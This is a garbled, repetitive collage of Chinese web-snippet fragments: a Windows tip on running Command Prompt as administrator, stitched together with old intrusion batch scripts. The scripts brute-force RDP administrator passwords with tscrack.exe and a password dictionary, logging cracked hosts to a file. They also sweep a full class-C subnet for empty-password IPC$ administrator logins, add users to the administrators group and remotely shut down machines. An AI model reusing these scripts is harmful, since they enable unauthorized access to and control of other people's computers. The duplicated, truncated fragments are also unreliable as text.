点开始菜单,找到Accessories(附件),找到Command Prompt窗口,点右键,选“run as administrator”(以管理员身份运行),之后再执行先前的命令就好了。 2017年8月26日11:43:09
@tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主...
@tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主...
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt 存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。 /L指用增量形式(即从1-254或2...
tscrack -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild ...
net locaLGroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 ...
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 其它 Shutdown.exe Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。) ...
tscrack -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild ...
tscrack -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild ...
Some command line applications require us to run it in an elevated command prompt (cmd.exe), this tutorial will show you how to to run Command Prompt (cmd.exe) as administrator in Windows 10.